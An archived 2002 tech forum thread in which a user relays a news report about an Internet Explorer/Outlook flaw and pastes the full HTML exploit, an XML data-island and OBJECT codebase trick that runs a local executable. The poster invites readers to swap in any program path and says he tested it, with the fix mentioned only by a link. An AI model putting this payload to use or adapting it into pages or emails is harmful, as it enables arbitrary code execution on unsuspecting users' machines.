Welcome to the TechSpot OpenBoards. Please read the FAQ if you have any questions. Login to participate.

Go Back   TechSpot OpenBoards > TS Community > News & Interesting links

Another IE/Outlook Hole

Reply
Bookmark / Share this page
Thread Tools
  #1  
Old 03-06-2002
lokem's Avatar
TechSpot Booster
 
Location: Assembled In Malaysia
Member since: Mar 2002, 773 posts
Another IE/Outlook Hole

The Register has just posted that IE/Outlook can run arbitrary commands with a simple bit of HTML.

Read the rest here:

http://www.theregister.co.uk/content/4/24274.html

The article also has a simple fix for this problem.

Here's the simple script:

<span datasrc="#oExec" datafld="exploit" dataformatas="html"></span>
<xml id="oExec">
<security>
<exploit>
<![CDATA[
<object id="oFile" classid="clsid:11111111-1111-1111-1111-111111111111" codebase="c:/windows/system32/calc.exe"></object>
]]>
</exploit>
</security>
</xml>


Change c:/windows/system32/calc.exe to the appropriate directory and filename you want to run. I've tested this myself, and it's REALLY scary.
Reply With Quote
Reply
Thread Tools

Forum Jump

Similar Topics
Thread Thread Starter Forum Replies Last Post
Black Hole! AvadaKedavra36 Device Drivers 3 09-01-2006 08:27 PM
Windows XP SP2 has serious security hole Phantasm66 Old Frontpage News & Comments 17 09-07-2004 12:02 PM
AIM Beta fixes security hole Phantasm66 Old Frontpage News & Comments 5 08-13-2004 01:16 AM
New Explorer hole could be devastating Julio Old Frontpage News & Comments 7 01-29-2004 09:30 AM
ZoneLabs Won't Fix Hole In Free Firewall Julio Old Frontpage News & Comments 1 07-03-2003 05:42 PM


All times are GMT -4. The time now is 06:19 AM.